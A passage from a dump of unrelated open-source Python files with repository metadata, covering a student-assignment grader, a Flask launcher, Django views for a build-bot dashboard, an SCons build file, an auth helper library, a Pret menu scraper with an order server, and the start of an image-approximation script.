os.system('clear')
print('======================')
print(csid)
print('======================')
assign6( csid , False)
outputFile.close()
def assign6( csid , writeToFile) :
fileToGrade = ""
late = 0
grade = 70
style = 30
wrongFileName = False
header = True
comments = " "
os.chdir(csid)
if writeToFile: outputFile.write(csid + "\t")
files = os.listdir('.')
#filename checking
for f in files :
splitted = subprocess.getoutput('ls -l ' + f).split()
if f == filename :
fileToGrade = filename
late = isLate(splitted)
break
elif f == filename.lower() :
fileToGrade = filename.lower()
late = isLate(splitted)
wrongFileName = True
break
#really odd filename
if fileToGrade == "" :
print(subprocess.getoutput('ls -l'))
fileToGrade = input("Which file should I grade? ")
if fileToGrade == "" :
if writeToFile:
outputFile.write("0\tno file\n")
os.chdir("..")
return
else :
splitted = subprocess.getoutput('ls -l ' + fileToGrade.replace(' ','\ ')).split()
late = isLate(splitted)
wrongFileName = True
#grading time!
if not fileToGrade == "" and late != -1:
answers = []
for x in range(len(inputArray)):
process = subprocess.Popen(['python3', fileToGrade], stdin = subprocess.PIPE, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
try:
out = process.communicate(bytes('\n'.join(inputArray[x].split()) + '\n', 'UTF-8'))[0]
except KeyboardInterrupt:
pass
answers.append(str(out)[2:-1])
count = 0
perfectCount = 0
closeCount = 0
wrongCount = 0
for answer, cor in zip(answers,correct):
cor = cor.split()
#extracting relevant data form the students output
nums = re.findall("\D+(\d+)\D+(\d+)", answer)
if len(nums) != 1:
wrongCount += 1
continue
elif len(nums[0]) != 2:
wrongCount += 1
continue
longNum = int(nums[0][0])
cycleLength = int(nums[0][1])
#perfect check
if count >= 6: #negative testing time!
perfect = "Enter starting number of the range: \nEnter ending number of the range: \n" * 6 +"The number " + str(cor[0]) + " has the longest cycle length of " + str(cor[1]+".")
else:
perfect = "Enter starting number of the range: \nEnter ending number of the range: \nThe number " + str(cor[0]) + " has the longest cycle length of " + str(cor[1]+".")
if perfect == answer.replace('\\n','\n').rstrip('\n'):
print('Perfect answer for #', count + 1)
perfectCount +=1
elif longNum == int(cor[0]) and cycleLength == int(cor[1]):
print('Close answer for #', count + 1)
print(perfect+"\n\tvs.\n\t"+answer.replace('\\n','\n\t'))
closeCount += 1
else:
print('Wrong answer for #', count + 1)
print(perfect+"\n\tvs.\n\t"+answer.replace('\\n','\n\t'))
wrongCount += 1
count += 1
print("Perfect:", str(perfectCount) + "/10")
print("Close:", str(closeCount) + "/10")
print("Wrong:", str(wrongCount) + "/10")
if wrongCount != 0 or closeCount != 0:
suggested_deduction = 3*wrongCount
deduction = input("How much to deduct for this output? Enter number or " +
"hit enter for suggested deduction (-" +
str(suggested_deduction) + "): ")
if not deduction.isdigit() :
deduction = suggested_deduction
else :
deduction = int(deduction)
grade -= deduction
comments += " Output did not match instructor's. Perfect: " + \
str(perfectCount) + " Close: " + str(closeCount) + \
" Wrong: " + str(wrongCount) + " (-" + str(deduction) + "). "
#checking for header and style
#os.system('vim ' + fileToGrade)
input("Hit Enter to cat")
print(subprocess.getoutput('cat ' + fileToGrade))
headerInput = input("Header( (y or enter) / n)? ")
if headerInput == 'y' or headerInput == '' :
header = True
else :
header = False
style = input("Style/Comments (Enter a number out of 30 to represent their grade, hit enter for 30): ")
comments += input ("General Comments?: ")
if not style.isdigit() :
style = 30
else :
style = int(style)
#writing grade time!
if late == -1:
if writeToFile: outputFile.write('0\t More than 7 days late')
else :
if late == 3:
comments += " 3 - 7 days late (-30). "
grade -= 30
elif late == 2 :
comments += " 2 days late (-20). "
grade -= 20
elif late == 1 :
comments += " 1 day late (-10). "
grade -= 10
if wrongFileName :
comments += " Wrong filename (-10). "
grade -= 10
if not header :
comments += " No/malformed header (-10). "
grade -= 10
if writeToFile: outputFile.write(str(grade+style) + "\t"+comments)
if writeToFile: outputFile.write('\n')
os.chdir("..")
#returns the number of days late an assignment is
def isLate( splitted ):
dueDate = datetime.strptime(dateString,"%m-%d-%Y %H:%M:%S")
lateOne = dueDate + timedelta(days=1)
lateTwo = lateOne + timedelta(days=1)
lateSev = dueDate + timedelta(days=7)
turninDate = datetime.strptime(splitted[5] + " " +( ("0" + splitted[6]) if len(splitted[6]) == 1 else splitted[6])+ " " + splitted[7] +" 2014", "%b %d %H:%M %Y")
if turninDate <= dueDate :
return 0
elif turninDate <= lateOne :
return 1
elif turninDate <= lateTwo :
return 2
elif turninDate <= lateSev:
return 3
else :
return -1
main()
|
UTF-8
|
Python
| false | false | 2,014 |
987,842,500,082 |
2023a03985577ec9b47704c263762a11e8b0a5b8
|
6ac4e8ee1d4f5df92815c4337a1c956300a8d857
|
/se34euca/runtest_snapshot.py
|
92eb29ae85ba8960b29a928a264793f94aad8a43
|
[] |
no_license
|
aliceh/se34euca
|
https://github.com/aliceh/se34euca
|
a8c7b88a6be5597f772a6cadb74e59befa7c43a8
|
6e993c5b77e8de6a68f6f575964bc86e335336e8
|
refs/heads/master
| 2021-01-17T21:54:17.328915 | 2014-10-21T18:43:33 | 2014-10-21T18:43:33 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/python
import se34euca
from se34euca.testcase.testcase_snapshot import testcase_snapshot
class Snapshot(se34euca.TestRunner):
testcase = "delete_snapshot"
testclass = testcase_snapshot
if __name__ == "__main__":
Snapshot().start_test()
|
UTF-8
|
Python
| false | false | 2,014 |
17,394,617,582,442 |
7261efedfd7f3ffe6e6a6a6c371c2abb8444a9f2
|
a6402c8b624cbfa4d476b0a33df611d5ad9c7c3f
|
/runserver.py
|
3adb1c36adf5a4a81842a1f5f3f1c2f5eebc4464
|
[] |
no_license
|
dancaron/flask-bootstrap
|
https://github.com/dancaron/flask-bootstrap
|
8ea92d50f6d4e1b9c507bd75734689b7cc2e5a23
|
1476fb4cf5dc132f0378fe4b3b57283efa6c68e3
|
refs/heads/master
| 2016-08-03T18:13:35.686043 | 2014-03-09T22:22:19 | 2014-03-09T22:22:19 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from yourapplication import app
# This script will start the Flask dev server on port 5000
if __name__ == "__main__":
app.run(debug=True, host="0.0.0.0")
|
UTF-8
|
Python
| false | false | 2,014 |
12,876,311,963,425 |
f529cd5e0482e48bc7c3d82829973b2ffbb25f06
|
a17d40d4bb54f1e010f6f86d37e5cd58c4346a79
|
/vendedores/views.py
|
a624ac94ec646e015fe6419ff75295c0241b9213
|
[] |
no_license
|
cdocarmo/cdmanager
|
https://github.com/cdocarmo/cdmanager
|
47b1662cedca6e39b2598ead5bfc6fd3267a784e
|
19ac639c9708d82015aa081b2616aebe4d173bba
|
refs/heads/master
| 2021-01-02T23:08:10.142229 | 2014-07-11T17:15:55 | 2014-07-11T17:15:55 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Create your views here.
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from vendedores.models import Vendedor, PedidoNoEnviado
from django.db.models import Q
from django.http import Http404, HttpResponse
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
import json
from django.core import serializers
import string
def cargo_vendedores(request):
vendedores = Vendedor.objects.all().order_by("nombre")
data = serializers.serialize("json", vendedores)
return HttpResponse(data, mimetype="application/json; charset=uft8")
def diferenacia_pedido(request, xVend):
xDif = PedidoNoEnviado.objects.filter(vendedor__codigo=xVend, visto=False)
data = serializers.serialize("json", xDif)
return HttpResponse(data, mimetype="application/json; charset=uft8")
|
UTF-8
|
Python
| false | false | 2,014 |
6,098,853,563,722 |
8b2d01794ac00e0dc1221bc8cd7b9b918e7c77c7
|
3588da6eec1ac1a5487313a3655a2d70a9446ae2
|
/src/SConscript
|
ffb40601a4567255184a45c0b84d941f05dcd9cf
|
[
"GPL-1.0-or-later",
"GPL-3.0-only"
] |
non_permissive
|
NiLSPACE/hCraft
|
https://github.com/NiLSPACE/hCraft
|
7c21574b3339a6db8b3ac85e35fc68845ad3c748
|
50730a476b5fc3a34bdc47de1d3056db92a63c14
|
refs/heads/master
| 2020-04-03T03:49:16.719069 | 2012-12-08T10:24:02 | 2012-12-08T10:24:02 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
hCraft_sources = Split("""
main.cpp
logger.cpp
server.cpp
player.cpp
playerlist.cpp
packet.cpp
scheduler.cpp
entity.cpp
position.cpp
chunk.cpp
world.cpp
blocks.cpp
worldgenerator.cpp
flatgrass.cpp
stringutils.cpp
wordwrap.cpp
threadpool.cpp
worldprovider.cpp
hwprovider.cpp
utils.cpp
rank.cpp
permissions.cpp
messages.cpp
nbt.cpp
window.cpp
items.cpp
slot.cpp
sql.cpp
lighting.cpp
commands/command.cpp
commands/help.cpp
commands/me.cpp
commands/ping.cpp
commands/wcreate.cpp
commands/wload.cpp
commands/world.cpp
commands/tp.cpp
commands/nick.cpp
commands/wunload.cpp
commands/physics.cpp
physics/sand.cpp
""")
hCraft_libs = Split("""
pthread
event
m
yaml-cpp
z
sqlite3
""")
Import('env')
env.Program(target = 'hCraft', source = hCraft_sources, LIBS = hCraft_libs)
|
UTF-8
|
Python
| false | false | 2,012 |
7,730,941,152,849 |
1f796a13d4f8443ad30c886f404e9ce4c95865be
|
f654a2896cce25b1de0f9a148fd8961335906d18
|
/pret/main.py
|
b5e98a31f521b44351f0b51d4e6f8fc2af0c4bb6
|
[] |
no_license
|
JNRowe-retired/pret-a-manger
|
https://github.com/JNRowe-retired/pret-a-manger
|
3a7316ffbf0fa85cdc4f0546c90ce78303304c0c
|
8f3297136026e27cfa9b8af42687ea0be104dea4
|
refs/heads/master
| 2020-04-11T03:00:55.364656 | 2013-05-31T16:29:54 | 2013-05-31T16:29:54 | 10,409,811 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import socket
import thread
import time
__author__ = 'Rachid Belaid'
import urllib2
from bs4 import BeautifulSoup
from termcolor import colored
def display_menu(kcal):
page = urllib2.urlopen("http://pret.com/menu/")
soup = BeautifulSoup(page, "html.parser")
product_categories = soup.find_all('div', {"class": "product_category"})
menu = []
for product_category in product_categories:
category = product_category.img['alt']
foods = product_category.find_all('a')
for food in foods:
if kcal:
page = urllib2.urlopen('http://pret.com/%s' % food['href'])
food_page = BeautifulSoup(page, "html.parser")
food_kcal = food_page.find_all('td', {"class": "nutr_value"})[0].text
food_tuple = (food.text, food_kcal)
else:
food_tuple = (food.text,)
menu.append(food_tuple)
display = ("%s %s %s") % (colored("[%s]" % category.upper(), 'yellow'),
food_tuple[0],
(colored("(%s kcal)" % food_tuple[1], 'red') if kcal else ''),
)
print "%s %s" % (display.ljust(90, '.'), (colored("[%s]" % len(menu), 'green')))
return menu
def wait_to_order():
my_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
my_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
my_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
my_socket.bind(('', 8881))
print 'Waiting for somebody to collect order ...'
order_server = None
while not order_server:
message, address = my_socket.recvfrom(8881)
order_server = str(address[0])
return order_server
def broadcast():
while True:
my_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
my_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
my_socket.sendto('I m hungry', ('<broadcast>', 8881))
time.sleep(1)
def start_server():
from SimpleXMLRPCServer import SimpleXMLRPCServer
name = raw_input('What is your name --> ')
def order(name, baskets):
for item in baskets:
print ("%s %s") % (colored('[%s]' % name, 'green'), colored('%s' % item, 'yellow'))
return True
def who():
return name
server = SimpleXMLRPCServer((socket.gethostbyname(socket.gethostname()), 8000), logRequests=False)
print "Listening order ..... "
server.register_function(who, "who")
server.register_function(order, "order")
server.serve_forever()
def main():
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-k", "--kcal",
action="store_true", dest="kcal", default=False,
help="print the kcal associate in the menu")
parser.add_option("-m", "--menu", action="store_true", dest="menu", default=False,
help="listen the menu only")
parser.add_option("-l", "--listen", action="store_true", dest="listen", default=False,
help="listen order of pret.com menu")
(options, args) = parser.parse_args()
if options.listen:
thread.start_new_thread(broadcast, ())
start_server()
else:
menu = display_menu(options.kcal)
if not options.menu:
order_server = wait_to_order()
import xmlrpclib
proxy = xmlrpclib.ServerProxy("http://%s:8000/" % order_server)
listener = proxy.who()
name = raw_input('What is your name --> ')
checkout = False
baskets = []
while not checkout:
order = raw_input('What do you want to order --> ')
if not order.isdigit():
continue
order = int(order)
conf = ''
while not str(conf).upper() in ['Y', 'N']:
conf = raw_input('Do you confirm the "%s" ? (Y/N) --> ' % menu[int(order) - 1][0])
if str(conf).upper() == 'Y':
baskets.append(menu[order - 1])
checkout = True if str(
raw_input('Do you want to order something else ? (Y/N)--> ')).upper() == 'N' else False
print "ORDER RESUME".center(60, "=")
for item in baskets:
print item[0]
send = raw_input('Do you want to send this order ? (Y/N)--> ')
if send:
if proxy.order(name, baskets):
print "ORDER RECEIVED BY %s" % listener
if __name__ == '__main__':
main()
|
UTF-8
|
Python
| false | false | 2,013 |
3,058,016,744,632 |
d8afaee250a6650fc7b04d46cbfc2729ecf9e80e
|
04ae786a0eeb4f30099eb4400a7ae8d1acbadb26
|
/horus/lib.py
|
793d4d24429829629ec6903253a149d8db846da8
|
[] |
no_license
|
ccomb/horus
|
https://github.com/ccomb/horus
|
e4e355083b8f0addbfadfd876fc5ee7976011c5c
|
07492431458acb5c7ee8506d5f458fc99f9c9c1e
|
refs/heads/master
| 2016-10-13T15:27:54.409959 | 2012-06-30T21:14:29 | 2012-06-30T21:14:29 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from pyramid.security import unauthenticated_userid
from horus.interfaces import IHorusSession
from horus.interfaces import IHorusUserClass
import hashlib
import random
import string
def generate_random_string(length):
"""Generate a generic hash key for the user to use"""
m = hashlib.sha256()
word = ''
for i in xrange(length):
word += random.choice(string.ascii_letters)
m.update(word)
return unicode(m.hexdigest()[:length])
def get_session(request):
session = request.registry.getUtility(IHorusSession)
return session
def get_user(request):
pk = unauthenticated_userid(request)
user_class = request.registry.queryUtility(IHorusUserClass)
if pk is not None:
return user_class.get_by_pk(request, pk)
def get_class_from_config(settings, key):
if key in settings:
user_modules = settings.get(key).split('.')
module = '.'.join(user_modules[:-1])
klass = user_modules[-1]
imported_module = __import__(module, fromlist=[klass])
imported_class = getattr(imported_module, klass)
return imported_class
else:
raise Exception('Please provide a %s config option' % key)
def pluralize(singular):
"""Return plural form of given lowercase singular word (English only). Based on
ActiveState recipe http://code.activestate.com/recipes/413172/
>>> pluralize('')
''
>>> pluralize('goose')
'geese'
>>> pluralize('dolly')
'dollies'
>>> pluralize('genius')
'genii'
>>> pluralize('jones')
'joneses'
>>> pluralize('pass')
'passes'
>>> pluralize('zero')
'zeros'
>>> pluralize('casino')
'casinos'
>>> pluralize('hero')
'heroes'
>>> pluralize('church')
'churches'
>>> pluralize('x')
'xs'
>>> pluralize('car')
'cars'
"""
ABERRANT_PLURAL_MAP = {
'appendix': 'appendices',
'barracks': 'barracks',
'cactus': 'cacti',
'child': 'children',
'criterion': 'criteria',
'deer': 'deer',
'echo': 'echoes',
'elf': 'elves',
'embargo': 'embargoes',
'focus': 'foci',
'fungus': 'fungi',
'goose': 'geese',
'hero': 'heroes',
'hoof': 'hooves',
'index': 'indices',
'knife': 'knives',
'leaf': 'leaves',
'life': 'lives',
'man': 'men',
'mouse': 'mice',
'nucleus': 'nuclei',
'person': 'people',
'phenomenon': 'phenomena',
'potato': 'potatoes',
'self': 'selves',
'syllabus': 'syllabi',
'tomato': 'tomatoes',
'torpedo': 'torpedoes',
'veto': 'vetoes',
'woman': 'women',
}
VOWELS = set('aeiou')
if not singular:
return ''
plural = ABERRANT_PLURAL_MAP.get(singular)
if plural:
return plural
root = singular
try:
if singular[-1] == 'y' and singular[-2] not in VOWELS:
root = singular[:-1]
suffix = 'ies'
elif singular[-1] == 's':
if singular[-2] in VOWELS:
if singular[-3:] == 'ius':
root = singular[:-2]
suffix = 'i'
else:
root = singular[:-1]
suffix = 'ses'
else:
suffix = 'es'
elif singular[-2:] in ('ch', 'sh'):
suffix = 'es'
else:
suffix = 's'
except IndexError:
suffix = 's'
plural = root + suffix
return plural
|
UTF-8
|
Python
| false | false | 2,012 |
4,355,096,877,767 |
4a207d84a2eb2ab3d043a56966376eb56f70eadb
|
68b26e6324e10f21bf2562f4d31325f34201a735
|
/cthulhubot/views.py
|
ca713c083810abf2c32e8403069529f55dedc2dd
|
[] |
no_license
|
centrumholdings/cthulhubot
|
https://github.com/centrumholdings/cthulhubot
|
63a8ee3766258d5fbd19bff26d6f54c982159d5f
|
38f6b98a02947973784b2ed2914d388b3d767a14
|
refs/heads/master
| 2020-04-06T21:38:29.307064 | 2011-10-19T10:56:26 | 2011-10-19T10:56:26 | 906,733 | 2 | 1 | null | false | 2013-09-14T14:10:02 | 2010-09-13T09:10:38 | 2013-07-21T03:04:10 | 2011-10-20T10:06:15 | 156 | null | 0 | 0 |
Python
| null | null |
from django.http import HttpResponse, HttpResponseNotFound, Http404, HttpResponseRedirect, HttpResponseBadRequest
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.db import transaction
from django.shortcuts import get_object_or_404
from django.views.generic.simple import direct_to_template
from anyjson import serialize, deserialize
from pymongo.objectid import ObjectId
from pymongo import DESCENDING
from pickle import dumps as pickle_dumps
from djangohttpdigest.decorators import protect_digest_model
from cthulhubot.bbot import create_master, BuildForcer
from cthulhubot.commands import get_undiscovered_commands
from cthulhubot.forms import CreateProjectForm, ComputerForm, get_build_computer_selection_form, get_job_configuration_form, get_command_params_from_form_data, get_scheduler_form
from cthulhubot.jobs import get_undiscovered_jobs
from cthulhubot.models import BuildComputer, Project, Job, Command, JobAssignment, ProjectClient, Buildmaster
from cthulhubot.mongo import get_database_connection
from cthulhubot.project import create_project
from cthulhubot.utils import dispatch_post
########### Helper controller-model dispatchers
def create_master(post, project, **kwargs):
create_master(project = project)
return HttpResponseRedirect(reverse("cthulhubot-project-detail", kwargs={
"project" : project.slug,
}))
def start_master(post, project, **kwargs):
project.buildmaster.start()
return HttpResponseRedirect(reverse("cthulhubot-project-detail", kwargs={
"project" : project.slug,
}))
def stop_master(post, project, **kwargs):
project.buildmaster.stop()
return HttpResponseRedirect(reverse("cthulhubot-project-detail", kwargs={
"project" : project.slug,
}))
def add_computer(post, **kwargs):
return BuildComputer.objects.add(
**kwargs
)
def check_builder(post, user, assignment, **kwargs):
# user.message_set.create(message="Your playlist was added successfully.")
return HttpResponseRedirect(reverse("cthulhubot-job-assignment-detail", kwargs={"assignment_id" : assignment.pk}))
def start_slave(post, project, **kwargs):
client = ProjectClient.objects.get(pk=int(post.get('client_id')))
client.start()
return HttpResponseRedirect(reverse("cthulhubot-project-detail", kwargs={
"project" : project.slug,
}))
def create_slave_dir(post, project, **kwargs):
client = ProjectClient.objects.get(pk=int(post.get('client_id')))
client.create_build_directory()
return HttpResponseRedirect(reverse("cthulhubot-project-detail", kwargs={
"project" : project.slug,
}))
def create_job_assignment(job, computer, project, params=None):
assignment = JobAssignment(
job = job.model,
project = project,
computer = computer,
).get_domain_object()
assignment.create_config(params)
assignment.model.version = assignment.job_version
assignment.model.save()
if len(ProjectClient.objects.filter(project=project, computer=computer)) == 0:
client = ProjectClient(project=project, computer=computer)
client.generate_password()
client.save()
return assignment
def force_build(post, project, user, **kwargs):
assignment = JobAssignment.objects.get(pk=int(post.get('assignment_id'))).get_domain_object()
assignment.force_build()
user.message_set.create(message="Build forced")
return HttpResponseRedirect(reverse("cthulhubot-project-detail", kwargs={
"project" : project.slug,
}))
########### VIEWS
@login_required
@transaction.commit_on_success
def dashboard(request):
return direct_to_template(request, 'cthulhubot/dashboard.html')
@login_required
def projects(request):
projects = Project.objects.all().order_by('name')
# for project in projects:
# project.get_absolute_url()
return direct_to_template(request, 'cthulhubot/projects.html', {
'projects' : projects,
})
@login_required
@transaction.commit_on_success
def projects_create(request):
if request.method == "POST":
form = CreateProjectForm(request.POST)
if form.is_valid():
project = create_project(
name = form.cleaned_data['name'],
tracker_uri = form.cleaned_data['issue_tracker'],
repository_uri = form.cleaned_data['repository']
)
return HttpResponseRedirect(reverse("cthulhubot-project-detail", kwargs={
"project" : project.slug,
}))
else:
form = CreateProjectForm()
return direct_to_template(request, 'cthulhubot/projects_create.html', {
'form' : form
})
@login_required
@transaction.commit_on_success
def project_detail(request, project):
project = get_object_or_404(Project, slug=project)
redirect = dispatch_post(request, {
"create_master" : create_master,
"start_master" : start_master,
"stop_master" : stop_master,
"stop_master" : stop_master,
"start_slave" : start_slave,
"create_slave_dir" : create_slave_dir,
"force_build" : force_build,
},
kwargs = {
"project" : project,
"user" : request.user,
}
)
if redirect:
return redirect
assignments = [assignment.get_domain_object() for assignment in JobAssignment.objects.filter(project=project)]
clients = list(set([assignment.get_client() for assignment in assignments]))
return direct_to_template(request, 'cthulhubot/project_detail.html', {
'project' : project,
'job_assignments' : assignments,
'clients' : clients,
})
@login_required
def project_changeset_view(request, project):
project = get_object_or_404(Project, slug=project)
db = get_database_connection()
info = db.repository.find().sort([("commiter_date", DESCENDING),])
changesets = []
for changeset in info:
changeset['results'] = [build['result'] for build in db.builds.find({"changeset" : changeset['hash']})]
changesets.append(changeset)
return direct_to_template(request, 'cthulhubot/project_changeset_view.html', {
'project' : project,
'changesets' : changesets,
})
@login_required
@transaction.commit_on_success
def computers(request):
computers = BuildComputer.objects.all().order_by('name')
return direct_to_template(request, 'cthulhubot/computers.html', {
'computers' : computers,
})
@login_required
@transaction.commit_on_success
def computers_create(request):
if request.method == "POST":
form = ComputerForm(request.POST)
if form.is_valid():
computer = form.save()
return HttpResponseRedirect(reverse("cthulhubot-computer-detail", kwargs={
"computer" : computer.slug,
}))
else:
form = ComputerForm()
return direct_to_template(request, 'cthulhubot/computers_create.html', {
'form' : form
})
@login_required
@transaction.commit_on_success
def computer_detail(request, computer):
computer = get_object_or_404(BuildComputer, slug=computer)
return direct_to_template(request, 'cthulhubot/computer_detail.html', {
'computer' : computer,
})
@login_required
@transaction.commit_on_success
def computer_edit(request, computer):
computer = get_object_or_404(BuildComputer, slug=computer)
if request.method == "POST":
form = ComputerForm(request.POST, instance=computer)
if form.is_valid():
computer = form.save()
return HttpResponseRedirect(reverse("cthulhubot-computer-detail", kwargs={
"computer" : computer.slug,
}))
else:
form = ComputerForm(instance=computer)
return direct_to_template(request, 'cthulhubot/computers_edit.html', {
'form' : form
})
@login_required
@transaction.commit_on_success
def commands(request):
commands = Command.objects.all().order_by('slug')
return direct_to_template(request, 'cthulhubot/commands.html', {
'commands' : commands,
})
@login_required
@transaction.commit_on_success
def commands_discover(request):
if request.method == "POST":
if len(request.POST.keys()) == 1:
command_slug = request.POST.keys()[0]
command = get_undiscovered_commands().get(command_slug)
if command:
Command.objects.get_or_create(slug=command.identifier)
return HttpResponseRedirect(reverse('cthulhubot-commands-discover'))
return direct_to_template(request, 'cthulhubot/commands_discover.html', {
'commands' : get_undiscovered_commands(),
})
@login_required
@transaction.commit_on_success
def jobs(request):
jobs = Job.objects.all().order_by('slug')
return direct_to_template(request, 'cthulhubot/jobs.html', {
'jobs' : jobs,
})
@login_required
@transaction.commit_on_success
def jobs_configure(request):
discovered = get_undiscovered_jobs()
available_commands = []
if request.method == "POST" and u'auto-discovery' in request.POST:
for job in get_undiscovered_jobs():
Job.objects.get_or_create(slug=job)
return HttpResponseRedirect(reverse('cthulhubot-jobs'))
return direct_to_template(request, 'cthulhubot/jobs_configure.html', {
'discovered_jobs' : discovered,
'available_commands' : available_commands,
})
@login_required
@transaction.commit_on_success
def job_add(request, job):
job_class = get_undiscovered_jobs().get(job)
if not job_class:
raise Http404()
job = job_class()
form = get_job_configuration_form(job)
return direct_to_template(request, 'cthulhubot/job_add.html', {
'job' : job,
'form' : form,
})
@login_required
@transaction.commit_on_success
def job_assigment(request, project):
project = get_object_or_404(Project, slug=project)
jobs = Job.objects.all().order_by('slug')
return direct_to_template(request, 'cthulhubot/job_assigment.html', {
'project' : project,
'jobs' : jobs,
})
@login_required
@transaction.commit_on_success
def job_assigment_config(request, project, job):
project = get_object_or_404(Project, slug=project)
job = get_object_or_404(Job, slug=job)
job = job.get_domain_object()
computers = BuildComputer.objects.all().order_by('name')
computer_form = get_build_computer_selection_form(computers)()
job_form = get_job_configuration_form(job)
scheduler_form = get_scheduler_form()
if request.method == "POST":
computer_form = get_build_computer_selection_form(computers)(request.POST)
job_form = get_job_configuration_form(job, post=request.POST)
scheduler_form = get_scheduler_form(post=request.POST)
if computer_form.is_valid() and job_form.is_valid() and scheduler_form.is_valid():
computer = get_object_or_404(BuildComputer, pk=computer_form.cleaned_data['computer'])
params = get_command_params_from_form_data(job, job_form.cleaned_data)
params.update(scheduler_form.get_configuration_dict())
create_job_assignment(computer=computer, job=job, project=project, params=params)
return HttpResponseRedirect(reverse('cthulhubot-project-detail', kwargs={'project' : project.slug}))
return direct_to_template(request, 'cthulhubot/job_assigment_config.html', {
'project' : project,
'job' : job,
'job_form' : job_form,
'computers' : computers,
'computer_form' : computer_form,
'scheduler_form' : scheduler_form,
})
@login_required
@transaction.commit_on_success
def job_assigment_detail(request, assignment_id):
assignment = get_object_or_404(JobAssignment, pk=assignment_id).get_domain_object()
redirect = dispatch_post(request, {
"builder-check" : check_builder,
},
kwargs = {
"user" : request.user,
"assignment" : assignment,
}
)
if redirect:
return redirect
return direct_to_template(request, 'cthulhubot/job_assignment_detail.html', {
'assignment' : assignment,
'project' : assignment.project,
'computer' : assignment.computer,
'job' : assignment.job,
'builds' : assignment.builds,
})
@protect_digest_model(realm=Buildmaster.REALM,
model=Buildmaster,
realm_field = None,
username_field='buildmaster_port',
password_field='password'
)
def api_buildmaster_config(request, identifier):
master = get_object_or_404(Buildmaster, pk=identifier)
return HttpResponse(pickle_dumps(master.get_config()))
#TODO: Authentication?
def api_force_build(request, assignment_id):
if request.method != "POST":
return HttpResponseBadRequest(["POST"])
assignment = get_object_or_404(JobAssignment, pk=assignment_id).get_domain_object()
master = assignment.project.get_buildmaster()
from urllib import unquote_plus
data = deserialize(unquote_plus(request.POST.get("data")))
forcer = BuildForcer(assignment=assignment, master=master, buildbot_data=data)
forcer.run()
#TODO: maybe return some status, like build number
return HttpResponse('{}')
@login_required
def step_part_detail(request, step, detail_name):
db = get_database_connection()
step = db.steps.find_one({"_id" : ObjectId(str(step))})
if not step or detail_name not in step:
return HttpResponseNotFound()
return HttpResponse(step[detail_name])
|
UTF-8
|
Python
| false | false | 2,011 |
13,314,398,657,934 |
8a090a8c2d65fc6ab922c75bb3f96bbac9f81051
|
231b99d853d5bdf8855ce83e8c359414572a63c5
|
/Sirpple/uac/uac_checker.py
|
5d3bea4ba0da9d0ba9a069b59906c4ea4a40f1c6
|
[] |
no_license
|
Samnsparky/Sirpple
|
https://github.com/Samnsparky/Sirpple
|
9d38a4fda08cef6e8f87a1a6d69f2cc852238050
|
526666edf29c836de64e15a6dab64d47a4c2a424
|
refs/heads/master
| 2016-09-06T01:42:46.043512 | 2011-12-12T09:26:24 | 2011-12-12T09:26:24 | 2,722,024 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
Module containing logic to check that a user is authorized to view / edit an entity
"""
# TODO: Factory currently sitting serialization.backends
class UACChecker:
"""
High level strategy interface to check to see if a user can view / edit a model instance
"""
def __init__(self):
pass
def is_authorized(self, target, user):
"""
Determines if the given user has read / write access to target
@param target: The model that the user wants to access
@type target: Any instance of the subclass of AdaptedModel currently in use
@param user: The user that wishes to access the model instance in question
@type user: The backend-specific user representation
"""
raise NotImplementedError("Must use implmentor of this interface")
class GAEUACChecker(UACChecker):
"""
Google App Engine specific implemention of UACChecker
"""
__instance = None
@classmethod
def get_instance(self):
"""
Get a shared instance of this GAEUACChecker singleton
@return: Shared GAEUACChecker instance
@rtype: GAEUACChecker
"""
if GAEUACChecker.__instance == None:
GAEUACChecker.__instance = GAEUACChecker()
return GAEUACChecker.__instance
def is_authorized(self, target, user):
return True # TODO: After authentication, this ought to be filled in
# NOTE: user or target might be null
|
UTF-8
|
Python
| false | false | 2,011 |
11,029,476,045,025 |
fe315fa8f975c08842adcb4ae142f0cc0d05f86b
|
6128881e158fe57c13228da1ddd2550c84a69c1b
|
/image_misc/poly_image.py
|
7ec04e86cf4f3ce814a9288c4c365f2aca9fb599
|
[] |
no_license
|
aroberge/py-fun
|
https://github.com/aroberge/py-fun
|
5c6b61308f29b3ddc12c43328d67fc6ff3636731
|
dd721e096f8445aee48e69c3a3ebf6501aecc95b
|
refs/heads/master
| 2021-01-19T06:45:34.216897 | 2011-07-09T14:26:19 | 2011-07-09T14:26:19 | 32,361,947 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''
Application to approximate an image by a set of polygons.
Inspired by:
http://rogeralsing.com/2008/12/07/genetic-programming-evolution-of-mona-lisa/
'''
from random import randint
import time
import copy
import Tkinter as tk
import tkFileDialog, tkMessageBox
import Image, ImageTk, ImageChops, ImageStat # from PIL
import aggdraw
from src.state_engine import StateEngine
from src.color_chooser import SimpleColorChooser
import src.dialogs as dialogs
FITNESS_OFFSET = 0
# todo: investigate the use of ImageStat.Stat(image, mask)
# todo: investigate the use of stat.mean instead of stat.rms
class Fitness(object):
def __init__(self):
self.fitness_offset = 0
def evaluate(self, im1, im2, background="black"):
"""Calculate a value derived from the root mean squared of the difference
between two images. It is normalized so that when a black image is
compared with the original one (img1), the fitness given is 0, and when the
image is identical, the fitness value is 100."""
try:
stat = ImageStat.Stat(ImageChops.difference(im1, im2))
except:
print "missing alpha channel in original image?"
im1.putalpha(255)
stat = ImageStat.Stat(ImageChops.difference(im1, im2))
